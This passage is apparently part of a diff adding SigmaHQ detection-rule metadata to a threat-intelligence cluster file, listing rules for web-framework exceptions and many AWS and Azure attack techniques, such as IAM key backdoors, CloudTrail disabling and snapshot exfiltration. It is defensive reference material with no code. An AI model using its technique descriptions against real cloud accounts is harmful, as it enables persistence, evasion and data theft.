"rpc_firewall" + } + }, + { + "description": "Detects suspicious Ruby on Rails exceptions that could indicate exploitation attempts", + "uuid": "0d2c3d4c-4b48-4ac3-8f23-ea845746bb1a", + "value": "Ruby on Rails Framework Exceptions", + "meta": { + "refs": [ + "http://edgeguides.rubyonrails.org/security.html", + "http://guides.rubyonrails.org/action_controller_overview.html", + "https://stackoverflow.com/questions/25892194/does-rails-come-with-a-not-authorized-exception", + "https://github.com/rails/rails/blob/cd08e6bcc4cd8948fe01e0be1ea0c7ca60373a25/actionpack/lib/action_dispatch/middleware/exception_wrapper.rb", + "https://github.com/SigmaHQ/sigma/tree/master/rules/application/ruby/appframework_ruby_on_rails_exceptions.yml" + ], + "tags": [ + "attack.initial_access", + "attack.t1190" + ], + "creation_date": "2017/08/06", + "filename": "appframework_ruby_on_rails_exceptions.yml", + "author": "Thomas Patzke", + "level": "medium", + "falsepositive": [ + "Application bugs" + ], + "logsource.category": "application", + "logsource.product": "ruby_on_rails" + } + }, + { + "description": "Detects suspicious Spring framework exceptions that could indicate exploitation attempts", + "uuid": "ae48ab93-45f7-4051-9dfe-5d30a3f78e33", + "value": "Spring Framework Exceptions", + "meta": { + "refs": [ + "https://docs.spring.io/spring-security/site/docs/current/apidocs/overview-tree.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/application/spring/appframework_spring_exceptions.yml" + ], + "tags": [ + "attack.initial_access", + "attack.t1190" + ], + "creation_date": "2017/08/06", + "filename": "appframework_spring_exceptions.yml", + "author": "Thomas Patzke", + "level": "medium", + "falsepositive": [ + "Application bugs" + ], + "logsource.category": "application", + "logsource.product": "spring" + } + }, + { + "description": "Detects SQL error messages that indicate probing for an injection attack", + "uuid": "8a670c6d-7189-4b1c-8017-a417ca84a086", + "value": "Suspicious SQL Error Messages", + "meta": { + "refs": [ + "http://www.sqlinjection.net/errors", + "https://github.com/SigmaHQ/sigma/tree/master/rules/application/sql/app_sqlinjection_errors.yml" + ], + "tags": [ + "attack.initial_access", + "attack.t1190" + ], + "creation_date": "2017/11/27", + "filename": "app_sqlinjection_errors.yml", + "author": "Bjoern Kimminich", + "level": "high", + "falsepositive": [ + "Application bugs" + ], + "logsource.category": "application", + "logsource.product": "sql" + } + }, + { + "description": "Detects when an user attached a Lambda layer to an existing function to override a library that is in use by the function, where their malicious code could utilize the function's IAM role for AWS API calls.\nThis would give an adversary access to the privileges associated with the Lambda service role that is attached to that function.\n", + "uuid": "97fbabf8-8e1b-47a2-b7d5-a418d2b95e3d", + "value": "AWS Attached Malicious Lambda Layer", + "meta": { + "refs": [ + "https://docs.aws.amazon.com/lambda/latest/dg/API_UpdateFunctionConfiguration.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/aws/aws_attached_malicious_lambda_layer.yml" + ], + "tags": [ + "attack.privilege_escalation" + ], + "creation_date": "2021/09/23", + "filename": "aws_attached_malicious_lambda_layer.yml", + "author": "Austin Songer", + "level": "medium", + "falsepositive": [ + "Lambda Layer being attached may be performed by a system administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment.", + "Lambda Layer being attached from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule." + ], + "logsource.category": "No established category", + "logsource.product": "aws" + } + }, + { + "description": "Detects disabling, deleting and updating of a Trail", + "uuid": "4db60cc0-36fb-42b7-9b58-a5b53019fb74", + "value": "AWS CloudTrail Important Change", + "meta": { + "refs": [ + "https://docs.aws.amazon.com/awscloudtrail/latest/userguide/best-practices-security.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/aws/aws_cloudtrail_disable_logging.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1562.001" + ], + "creation_date": "2020/01/21", + "filename": "aws_cloudtrail_disable_logging.yml", + "author": "vitaliy0x1", + "level": "medium", + "falsepositive": [ + "Valid change in a Trail" + ], + "logsource.category": "No established category", + "logsource.product": "aws" + } + }, + { + "description": "Detects AWS Config Service disabling", + "uuid": "07330162-dba1-4746-8121-a9647d49d297", + "value": "AWS Config Disabling Channel/Recorder", + "meta": { + "refs": [ + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/aws/aws_config_disable_recording.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1562.001" + ], + "creation_date": "2020/01/21", + "filename": "aws_config_disable_recording.yml", + "author": "vitaliy0x1", + "level": "high", + "falsepositive": [ + "Valid change in AWS Config Service" + ], + "logsource.category": "No established category", + "logsource.product": "aws" + } + }, + { + "description": "Identifies disabling of default Amazon Elastic Block Store (EBS) encryption in the current region.\nDisabling default encryption does not change the encryption status of your existing volumes.\n", + "uuid": "16124c2d-e40b-4fcc-8f2c-5ab7870a2223", + "value": "AWS EC2 Disable EBS Encryption", + "meta": { + "refs": [ + "https://docs.aws.amazon.com/AWSEC2/latest/APIReference/API_DisableEbsEncryptionByDefault.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/aws/aws_ec2_disable_encryption.yml" + ], + "tags": [ + "attack.impact", + "attack.t1486", + "attack.t1565" + ], + "creation_date": "2021/06/29", + "filename": "aws_ec2_disable_encryption.yml", + "author": "Sittikorn S", + "level": "medium", + "falsepositive": [ + "System Administrator Activities", + "DEV, UAT, SAT environment. You should apply this rule with PROD account only." + ], + "logsource.category": "No established category", + "logsource.product": "aws" + } + }, + { + "description": "Detects bulk downloading of User Data associated with AWS EC2 instances. Instance User Data may include installation scripts and hard-coded secrets for deployment.", + "uuid": "26ff4080-194e-47e7-9889-ef7602efed0c", + "value": "AWS EC2 Download Userdata", + "meta": { + "refs": [ + "https://github.com/RhinoSecurityLabs/pacu/blob/866376cd711666c775bbfcde0524c817f2c5b181/pacu/modules/ec2__download_userdata/main.py", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/aws/aws_ec2_download_userdata.yml" + ], + "tags": [ + "attack.exfiltration", + "attack.t1020" + ], + "creation_date": "2020/02/11", + "filename": "aws_ec2_download_userdata.yml", + "author": "faloker", + "level": "medium", + "falsepositive": [ + "Assets management software like device42" + ], + "logsource.category": "No established category", + "logsource.product": "aws" + } + }, + { + "description": "Detects changes to the EC2 instance startup script. The shell script will be executed as root/SYSTEM every time the specific instances are booted up.", + "uuid": "1ab3c5ed-5baf-417b-bb6b-78ca33f6c3df", + "value": "AWS EC2 Startup Shell Script Change", + "meta": { + "refs": [ + "https://github.com/RhinoSecurityLabs/pacu/blob/866376cd711666c775bbfcde0524c817f2c5b181/pacu/modules/ec2__startup_shell_script/main.py#L9", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/aws/aws_ec2_startup_script_change.yml" + ], + "tags": [ + "attack.execution", + "attack.t1059.001", + "attack.t1059.003", + "attack.t1059.004" + ], + "creation_date": "2020/02/12", + "filename": "aws_ec2_startup_script_change.yml", + "author": "faloker", + "level": "high", + "falsepositive": [ + "Valid changes to the startup script" + ], + "logsource.category": "No established category", + "logsource.product": "aws" + } + }, + { + "description": "An attempt to export an AWS EC2 instance has been detected. A VM Export might indicate an attempt to extract information from an instance.", + "uuid": "54b9a76a-3c71-4673-b4b3-2edb4566ea7b", + "value": "AWS EC2 VM Export Failure", + "meta": { + "refs": [ + "https://docs.aws.amazon.com/vm-import/latest/userguide/vmexport.html#export-instance", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/aws/aws_ec2_vm_export_failure.yml" + ], + "tags": [ + "attack.collection", + "attack.t1005", + "attack.exfiltration", + "attack.t1537" + ], + "creation_date": "2020/04/16", + "filename": "aws_ec2_vm_export_failure.yml", + "author": "Diogo Braz", + "level": "low", + "falsepositive": "No established falsepositives", + "logsource.category": "No established category", + "logsource.product": "aws" + } + }, + { + "description": "Detects when an Elastic Container Service (ECS) Task Definition has been modified and run.\nThis can indicate an adversary adding a backdoor to establish persistence or escalate privileges.\nThis rule is based on examining events created upon execution of Rhino Security Lab's Pacu in a lab environment.\n", + "uuid": "b94bf91e-c2bf-4047-9c43-c6810f43baad", + "value": "AWS ECS Backdoor Task Definition", + "meta": { + "refs": [ + "https://github.com/RhinoSecurityLabs/pacu/blob/866376cd711666c775bbfcde0524c817f2c5b181/pacu/modules/ecs__backdoor_task_def/main.py", + "https://docs.aws.amazon.com/AmazonECS/latest/APIReference/API_RegisterTaskDefinition.html", + "https://attack.mitre.org/techniques/T1525", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/aws/aws_ecs_task_definition_backdoor.yml" + ], + "tags": [ + "attack.persistence", + "attack.t1525" + ], + "creation_date": "2022/06/07", + "filename": "aws_ecs_task_definition_backdoor.yml", + "author": "Darin Smith", + "level": "medium", + "falsepositive": [ + "Task Definition being modified to request credentials from the Task Metadata Service for valid reasons" + ], + "logsource.category": "No established category", + "logsource.product": "aws" + } + }, + { + "description": "Detects when a EFS Fileshare is modified or deleted.\nYou can't delete a file system that is in use.\nIf the file system has any mount targets, the adversary must first delete them, so deletion of a mount will occur before deletion of a fileshare.\n", + "uuid": "25cb1ba1-8a19-4a23-a198-d252664c8cef", + "value": "AWS EFS Fileshare Modified or Deleted", + "meta": { + "refs": [ + "https://docs.aws.amazon.com/efs/latest/ug/API_DeleteFileSystem.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/aws/aws_efs_fileshare_modified_or_deleted.yml" + ], + "tags": [ + "attack.impact" + ], + "creation_date": "2021/08/15", + "filename": "aws_efs_fileshare_modified_or_deleted.yml", + "author": "Austin Songer @austinsonger", + "level": "medium", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "No established category", + "logsource.product": "aws" + } + }, + { + "description": "Detects when a EFS Fileshare Mount is modified or deleted. An adversary breaking any file system using the mount target that is being deleted, which might disrupt instances or applications using those mounts.", + "uuid": "6a7ba45c-63d8-473e-9736-2eaabff79964", + "value": "AWS EFS Fileshare Mount Modified or Deleted", + "meta": { + "refs": [ + "https://docs.aws.amazon.com/efs/latest/ug/API_DeleteMountTarget.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/aws/aws_efs_fileshare_mount_modified_or_deleted.yml" + ], + "tags": [ + "attack.impact", + "attack.t1485" + ], + "creation_date": "2021/08/15", + "filename": "aws_efs_fileshare_mount_modified_or_deleted.yml", + "author": "Austin Songer @austinsonger", + "level": "medium", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "No established category", + "logsource.product": "aws" + } + }, + { + "description": "Identifies when an EKS cluster is created or deleted.", + "uuid": "33d50d03-20ec-4b74-a74e-1e65a38af1c0", + "value": "AWS EKS Cluster Created or Deleted", + "meta": { + "refs": [ + "https://any-api.com/amazonaws_com/eks/docs/API_Description", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/aws/aws_eks_cluster_created_or_deleted.yml" + ], + "tags": [ + "attack.impact", + "attack.t1485" + ], + "creation_date": "2021/08/16", + "filename": "aws_eks_cluster_created_or_deleted.yml", + "author": "Austin Songer", + "level": "low", + "falsepositive": [ + "EKS Cluster being created or deleted may be performed by a system administrator.", + "Verify whether the user identity, user agent, and/or hostname should be making changes in your environment.", + "EKS Cluster created or deleted from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule." + ], + "logsource.category": "No established category", + "logsource.product": "aws" + } + }, + { + "description": "Detects when an ElastiCache security group has been created.", + "uuid": "4ae68615-866f-4304-b24b-ba048dfa5ca7", + "value": "AWS ElastiCache Security Group Created", + "meta": { + "refs": [ + "https://github.com/elastic/detection-rules/blob/598f3d7e0a63221c0703ad9a0ea7e22e7bc5961e/rules/integrations/aws/persistence_elasticache_security_group_creation.toml", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/aws/aws_elasticache_security_group_created.yml" + ], + "tags": [ + "attack.persistence", + "attack.t1136", + "attack.t1136.003" + ], + "creation_date": "2021/07/24", + "filename": "aws_elasticache_security_group_created.yml", + "author": "Austin Songer @austinsonger", + "level": "low", + "falsepositive": [ + "A ElastiCache security group may be created by a system or network administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment. Security group creations from unfamiliar users or hosts should be investigated. If known behavior is causing false positives, it can be exempted from the rule." + ], + "logsource.category": "No established category", + "logsource.product": "aws" + } + }, + { + "description": "Identifies when an ElastiCache security group has been modified or deleted.", + "uuid": "7c797da2-9cf2-4523-ba64-33b06339f0cc", + "value": "AWS ElastiCache Security Group Modified or Deleted", + "meta": { + "refs": [ + "https://github.com/elastic/detection-rules/blob/7d5efd68603f42be5e125b5a6a503b2ef3ac0f4e/rules/integrations/aws/impact_elasticache_security_group_modified_or_deleted.toml", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/aws/aws_elasticache_security_group_modified_or_deleted.yml" + ], + "tags": [ + "attack.impact", + "attack.t1531" + ], + "creation_date": "2021/07/24", + "filename": "aws_elasticache_security_group_modified_or_deleted.yml", + "author": "Austin Songer @austinsonger", + "level": "low", + "falsepositive": [ + "A ElastiCache security group deletion may be done by a system or network administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment. Security Group deletions from unfamiliar users or hosts should be investigated. If known behavior is causing false positives, it can be exempted from the rule." + ], + "logsource.category": "No established category", + "logsource.product": "aws" + } + }, + { + "description": "Detects enumeration of accounts configuration via api call to list different instances and services within a short period of time.", + "uuid": "e9c14b23-47e2-4a8b-8a63-d36618e33d70", + "value": "Account Enumeration on AWS", + "meta": { + "refs": [ + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/aws/aws_enum_listing.yml" + ], + "tags": [ + "attack.discovery", + "attack.t1592" + ], + "creation_date": "2020/11/21", + "filename": "aws_enum_listing.yml", + "author": "toffeebr33k", + "level": "low", + "falsepositive": [ + "AWS Config or other configuration scanning activities" + ], + "logsource.category": "No established category", + "logsource.product": "aws" + } + }, + { + "description": "Detects updates of the GuardDuty list of trusted IPs, perhaps to disable security alerts against malicious IPs.", + "uuid": "6e61ee20-ce00-4f8d-8aee-bedd8216f7e3", + "value": "AWS GuardDuty Important Change", + "meta": { + "refs": [ + "https://github.com/RhinoSecurityLabs/pacu/blob/866376cd711666c775bbfcde0524c817f2c5b181/pacu/modules/guardduty__whitelist_ip/main.py#L9", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/aws/aws_guardduty_disruption.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1562.001" + ], + "creation_date": "2020/02/11", + "filename": "aws_guardduty_disruption.yml", + "author": "faloker", + "level": "high", + "falsepositive": [ + "Valid change in the GuardDuty (e.g. to ignore internal scanners)" + ], + "logsource.category": "No established category", + "logsource.product": "aws" + } + }, + { + "description": "Detects AWS API key creation for a user by another user.\nBackdoored users can be used to obtain persistence in the AWS environment.\nAlso with this alert, you can detect a flow of AWS keys in your org.\n", + "uuid": "0a5177f4-6ca9-44c2-aacf-d3f3d8b6e4d2", + "value": "AWS IAM Backdoor Users Keys", + "meta": { + "refs": [ + "https://github.com/RhinoSecurityLabs/pacu/blob/866376cd711666c775bbfcde0524c817f2c5b181/pacu/modules/iam__backdoor_users_keys/main.py", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/aws/aws_iam_backdoor_users_keys.yml" + ], + "tags": [ + "attack.persistence", + "attack.t1098" + ], + "creation_date": "2020/02/12", + "filename": "aws_iam_backdoor_users_keys.yml", + "author": "faloker", + "level": "medium", + "falsepositive": [ + "Adding user keys to their own accounts (the filter cannot cover all possible variants of user naming)", + "AWS API keys legitimate exchange workflows" + ], + "logsource.category": "No established category", + "logsource.product": "aws" + } + }, + { + "description": "Detects when an user creates or invokes a lambda function.", + "uuid": "d914951b-52c8-485f-875e-86abab710c0b", + "value": "AWS Lambda Function Created or Invoked", + "meta": { + "refs": [ + "https://rhinosecuritylabs.com/aws/aws-privilege-escalation-methods-mitigation/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/aws/aws_lambda_function_created_or_invoked.yml" + ], + "tags": [ + "attack.privilege_escalation", + "attack.t1078" + ], + "creation_date": "2021/10/03", + "filename": "aws_lambda_function_created_or_invoked.yml", + "author": "Austin Songer @austinsonger", + "level": "low", + "falsepositive": [ + "Lambda Function created or invoked may be performed by a system administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment.", + "If known behavior is causing false positives, it can be exempted from the rule." + ], + "logsource.category": "No established category", + "logsource.product": "aws" + } + }, + { + "description": "Detects evade to Macie detection.", + "uuid": "91f6a16c-ef71-437a-99ac-0b070e3ad221", + "value": "AWS Macie Evasion", + "meta": { + "refs": [ + "https://docs.aws.amazon.com/cli/latest/reference/macie/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/aws/aws_macic_evasion.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1562.001" + ], + "creation_date": "2021/07/06", + "filename": "aws_macic_evasion.yml", + "author": "Sittikorn S", + "level": "medium", + "falsepositive": [ + "System or Network administrator behaviors" + ], + "logsource.category": "No established category", + "logsource.product": "aws" + } + }, + { + "description": "Detects possible suspicious glue development endpoint activity.", + "uuid": "4990c2e3-f4b8-45e3-bc3c-30b14ff0ed26", + "value": "AWS Glue Development Endpoint Activity", + "meta": { + "refs": [ + "https://rhinosecuritylabs.com/aws/aws-privilege-escalation-methods-mitigation/", + "https://docs.aws.amazon.com/glue/latest/webapi/API_CreateDevEndpoint.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/aws/aws_passed_role_to_glue_development_endpoint.yml" + ], + "tags": [ + "attack.privilege_escalation" + ], + "creation_date": "2021/10/03", + "filename": "aws_passed_role_to_glue_development_endpoint.yml", + "author": "Austin Songer @austinsonger", + "level": "low", + "falsepositive": [ + "Glue Development Endpoint Activity may be performed by a system administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment.", + "If known behavior is causing false positives, it can be exempted from the rule." + ], + "logsource.category": "No established category", + "logsource.product": "aws" + } + }, + { + "description": "Detects the change of database master password. It may be a part of data exfiltration.", + "uuid": "8a63cdd4-6207-414a-85bc-7e032bd3c1a2", + "value": "AWS RDS Master Password Change", + "meta": { + "refs": [ + "https://github.com/RhinoSecurityLabs/pacu/blob/866376cd711666c775bbfcde0524c817f2c5b181/pacu/modules/rds__explore_snapshots/main.py", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/aws/aws_rds_change_master_password.yml" + ], + "tags": [ + "attack.exfiltration", + "attack.t1020" + ], + "creation_date": "2020/02/12", + "filename": "aws_rds_change_master_password.yml", + "author": "faloker", + "level": "medium", + "falsepositive": [ + "Benign changes to a db instance" + ], + "logsource.category": "No established category", + "logsource.product": "aws" + } + }, + { + "description": "Detects the recovery of a new public database instance from a snapshot. It may be a part of data exfiltration.", + "uuid": "c3f265c7-ff03-4056-8ab2-d486227b4599", + "value": "Restore Public AWS RDS Instance", + "meta": { + "refs": [ + "https://github.com/RhinoSecurityLabs/pacu/blob/866376cd711666c775bbfcde0524c817f2c5b181/pacu/modules/rds__explore_snapshots/main.py", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/aws/aws_rds_public_db_restore.yml" + ], + "tags": [ + "attack.exfiltration", + "attack.t1020" + ], + "creation_date": "2020/02/12", + "filename": "aws_rds_public_db_restore.yml", + "author": "faloker", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "No established category", + "logsource.product": "aws" + } + }, + { + "description": "Detects AWS root account usage", + "uuid": "8ad1600d-e9dc-4251-b0ee-a65268f29add", + "value": "AWS Root Credentials", + "meta": { + "refs": [ + "https://docs.aws.amazon.com/IAM/latest/UserGuide/id_root-user.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/aws/aws_root_account_usage.yml" + ], + "tags": [ + "attack.privilege_escalation", + "attack.t1078.004" + ], + "creation_date": "2020/01/21", + "filename": "aws_root_account_usage.yml", + "author": "vitaliy0x1", + "level": "medium", + "falsepositive": [ + "AWS Tasks That Require AWS Account Root User Credentials https://docs.aws.amazon.com/general/latest/gr/aws_tasks-that-require-root.html" + ], + "logsource.category": "No established category", + "logsource.product": "aws" + } + }, + { + "description": "Detects when a transfer lock was removed from a Route 53 domain. It is recommended to refrain from performing this action unless intending to transfer the domain to a different registrar.", + "uuid": "3940b5f1-3f46-44aa-b746-ebe615b879e0", + "value": "AWS Route 53 Domain Transfer Lock Disabled", + "meta": { + "refs": [ + "https://github.com/elastic/detection-rules/blob/c76a39796972ecde44cb1da6df47f1b6562c9770/rules/integrations/aws/persistence_route_53_domain_transfer_lock_disabled.toml", + "https://docs.aws.amazon.com/Route53/latest/APIReference/API_Operations_Amazon_Route_53.html", + "https://docs.aws.amazon.com/Route53/latest/APIReference/API_domains_DisableDomainTransferLock.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/aws/aws_route_53_domain_transferred_lock_disabled.yml" + ], + "tags": [ + "attack.persistence", + "attack.credential_access", + "attack.t1098" + ], + "creation_date": "2021/07/22", + "filename": "aws_route_53_domain_transferred_lock_disabled.yml", + "author": "Elastic, Austin Songer @austinsonger", + "level": "low", + "falsepositive": [ + "A domain transfer lock may be disabled by a system or network administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment. Activity from unfamiliar users or hosts should be investigated. If known behavior is causing false positives, it can be exempted from the rule." + ], + "logsource.category": "No established category", + "logsource.product": "aws" + } + }, + { + "description": "Detects when a request has been made to transfer a Route 53 domain to another AWS account.", + "uuid": "b056de1a-6e6e-4e40-a67e-97c9808cf41b", + "value": "AWS Route 53 Domain Transferred to Another Account", + "meta": { + "refs": [ + "https://github.com/elastic/detection-rules/blob/c76a39796972ecde44cb1da6df47f1b6562c9770/rules/integrations/aws/persistence_route_53_domain_transferred_to_another_account.toml", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/aws/aws_route_53_domain_transferred_to_another_account.yml" + ], + "tags": [ + "attack.persistence", + "attack.credential_access", + "attack.t1098" + ], + "creation_date": "2021/07/22", + "filename": "aws_route_53_domain_transferred_to_another_account.yml", + "author": "Elastic, Austin Songer @austinsonger", + "level": "low", + "falsepositive": [ + "A domain may be transferred to another AWS account by a system or network administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment. Domain transfers from unfamiliar users or hosts should be investigated. If known behavior is causing false positives, it can be exempted from the rule." + ], + "logsource.category": "No established category", + "logsource.product": "aws" + } + }, + { + "description": "Detects when a user tampers with S3 data management in Amazon Web Services.", + "uuid": "78b3756a-7804-4ef7-8555-7b9024a02e2d", + "value": "AWS S3 Data Management Tampering", + "meta": { + "refs": [ + "https://github.com/elastic/detection-rules/pull/1145/files", + "https://docs.aws.amazon.com/AmazonS3/latest/API/API_Operations.html", + "https://docs.aws.amazon.com/AmazonS3/latest/API/API_PutBucketLogging.html", + "https://docs.aws.amazon.com/AmazonS3/latest/API/API_PutBucketWebsite.html", + "https://docs.aws.amazon.com/AmazonS3/latest/API/API_PutBucketEncryption.html", + "https://docs.aws.amazon.com/AmazonS3/latest/userguide/setting-repl-config-perm-overview.html", + "https://docs.aws.amazon.com/AmazonS3/latest/API/API_RestoreObject.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/aws/aws_s3_data_management_tampering.yml" + ], + "tags": [ + "attack.exfiltration", + "attack.t1537" + ], + "creation_date": "2021/07/24", + "filename": "aws_s3_data_management_tampering.yml", + "author": "Austin Songer @austinsonger", + "level": "low", + "falsepositive": [ + "A S3 configuration change may be done by a system or network administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment. S3 configuration change from unfamiliar users or hosts should be investigated. If known behavior is causing false positives, it can be exempted from the rule." + ], + "logsource.category": "No established category", + "logsource.product": "aws" + } + }, + { + "description": "Detects the modification of the findings on SecurityHub.", + "uuid": "a607e1fe-74bf-4440-a3ec-b059b9103157", + "value": "AWS SecurityHub Findings Evasion", + "meta": { + "refs": [ + "https://docs.aws.amazon.com/cli/latest/reference/securityhub/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/aws/aws_securityhub_finding_evasion.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1562" + ], + "creation_date": "2021/06/28", + "filename": "aws_securityhub_finding_evasion.yml", + "author": "Sittikorn S", + "level": "high", + "falsepositive": [ + "System or Network administrator behaviors", + "DEV, UAT, SAT environment. You should apply this rule with PROD environment only." + ], + "logsource.category": "No established category", + "logsource.product": "aws" + } + }, + { + "description": "Detects the modification of an EC2 snapshot's permissions to enable access from another account", + "uuid": "abae8fec-57bd-4f87-aff6-6e3db989843d", + "value": "AWS Snapshot Backup Exfiltration", + "meta": { + "refs": [ + "https://www.justice.gov/file/1080281/download", + "https://attack.mitre.org/techniques/T1537/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/aws/aws_snapshot_backup_exfiltration.yml" + ], + "tags": [ + "attack.exfiltration", + "attack.t1537" + ], + "creation_date": "2021/05/17", + "filename": "aws_snapshot_backup_exfiltration.yml", + "author": "Darin Smith", + "level": "medium", + "falsepositive": [ + "Valid change to a snapshot's permissions" + ], + "logsource.category": "No established category", + "logsource.product": "aws" + } + }, + { + "description": "Identifies the suspicious use of AssumeRole. Attackers could move laterally and escalate privileges.", + "uuid": "905d389b-b853-46d0-9d3d-dea0d3a3cd49", + "value": "AWS STS AssumeRole Misuse", + "meta": { + "refs": [ + "https://github.com/elastic/detection-rules/pull/1214", + "https://docs.aws.amazon.com/STS/latest/APIReference/API_AssumeRole.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/aws/aws_sts_assumerole_misuse.yml" + ], + "tags": [ + "attack.lateral_movement", + "attack.privilege_escalation", + "attack.t1548", + "attack.t1550", + "attack.t1550.001" + ], + "creation_date": "2021/07/24", + "filename": "aws_sts_assumerole_misuse.yml", + "author": "Austin Songer @austinsonger", + "level": "low", + "falsepositive": [ + "AssumeRole may be done by a system or network administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment.", + "AssumeRole from unfamiliar users or hosts should be investigated. If known behavior is causing false positives, it can be exempted from the rule.", + "Automated processes that uses Terraform may lead to false positives." + ], + "logsource.category": "No established category", + "logsource.product": "aws" + } + }, + { + "description": "Identifies the suspicious use of GetSessionToken. Tokens could be created and used by attackers to move laterally and escalate privileges.", + "uuid": "b45ab1d2-712f-4f01-a751-df3826969807", + "value": "AWS STS GetSessionToken Misuse", + "meta": { + "refs": [ + "https://github.com/elastic/detection-rules/pull/1213", + "https://docs.aws.amazon.com/STS/latest/APIReference/API_GetSessionToken.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/aws/aws_sts_getsessiontoken_misuse.yml" + ], + "tags": [ + "attack.lateral_movement", + "attack.privilege_escalation", + "attack.t1548", + "attack.t1550", + "attack.t1550.001" + ], + "creation_date": "2021/07/24", + "filename": "aws_sts_getsessiontoken_misuse.yml", + "author": "Austin Songer @austinsonger", + "level": "low", + "falsepositive": [ + "GetSessionToken may be done by a system or network administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment. GetSessionToken from unfamiliar users or hosts should be investigated. If known behavior is causing false positives, it can be exempted from the rule." + ], + "logsource.category": "No established category", + "logsource.product": "aws" + } + }, + { + "description": "Identifies when suspicious SAML activity has occurred in AWS. An adversary could gain backdoor access via SAML.", + "uuid": "f43f5d2f-3f2a-4cc8-b1af-81fde7dbaf0e", + "value": "AWS Suspicious SAML Activity", + "meta": { + "refs": [ + "https://docs.aws.amazon.com/IAM/latest/APIReference/API_UpdateSAMLProvider.html", + "https://docs.aws.amazon.com/STS/latest/APIReference/API_AssumeRoleWithSAML.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/aws/aws_susp_saml_activity.yml" + ], + "tags": [ + "attack.initial_access", + "attack.t1078", + "attack.lateral_movement", + "attack.t1548", + "attack.privilege_escalation", + "attack.t1550", + "attack.t1550.001" + ], + "creation_date": "2021/09/22", + "filename": "aws_susp_saml_activity.yml", + "author": "Austin Songer", + "level": "medium", + "falsepositive": [ + "Automated processes that uses Terraform may lead to false positives.", + "SAML Provider could be updated by a system administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment.", + "SAML Provider being updated from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule." + ], + "logsource.category": "No established category", + "logsource.product": "aws" + } + }, + { + "description": "An attacker with the iam:UpdateLoginProfile permission on other users can change the password used to login to the AWS console on any user that already has a login profile setup.\nWith this alert, it is used to detect anyone is changing password on behalf of other users.\n", + "uuid": "055fb148-60f8-462d-ad16-26926ce050f1", + "value": "AWS User Login Profile Was Modified", + "meta": { + "refs": [ + "https://github.com/RhinoSecurityLabs/AWS-IAM-Privilege-Escalation", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/aws/aws_update_login_profile.yml" + ], + "tags": [ + "attack.persistence", + "attack.t1098" + ], + "creation_date": "2021/08/09", + "filename": "aws_update_login_profile.yml", + "author": "toffeebr33k", + "level": "high", + "falsepositive": [ + "Legit User Account Administration" + ], + "logsource.category": "No established category", + "logsource.product": "aws" + } + }, + { + "description": "This detection uses azureactivity logs (Administrative category) to identify the creation or update of a server instance in an Azure AD Hybrid health AD FS service.\nA threat actor can create a new AD Health ADFS service and create a fake server instance to spoof AD FS signing logs. There is no need to compromise an on-prem AD FS server.\nThis can be done programmatically via HTTP requests to Azure.\n", + "uuid": "288a39fc-4914-4831-9ada-270e9dc12cb4", + "value": "Azure Active Directory Hybrid Health AD FS New Server", + "meta": { + "refs": [ + "https://o365blog.com/post/hybridhealthagent/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_aadhybridhealth_adfs_new_server.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1578" + ], + "creation_date": "2021/08/26", + "filename": "azure_aadhybridhealth_adfs_new_server.yml", + "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research), MSTIC", + "level": "medium", + "falsepositive": [ + "Legitimate AD FS 